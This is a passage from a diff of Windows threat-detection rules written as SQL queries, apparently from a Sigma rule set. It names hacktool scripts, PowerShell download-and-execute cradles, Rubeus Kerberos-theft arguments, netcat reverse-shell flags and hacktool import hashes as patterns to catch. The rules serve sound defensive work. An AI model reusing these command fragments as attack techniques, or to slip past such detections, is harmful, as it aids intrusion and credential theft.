'\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": 
"proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE 
'\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', 
'8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE 
'%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "HackTool - CrackMapExec PowerShell Obfuscation", + "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "status": "test", + "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR 
CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", - "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR 
CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of 
command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HackSys 
Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unlikely" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + 
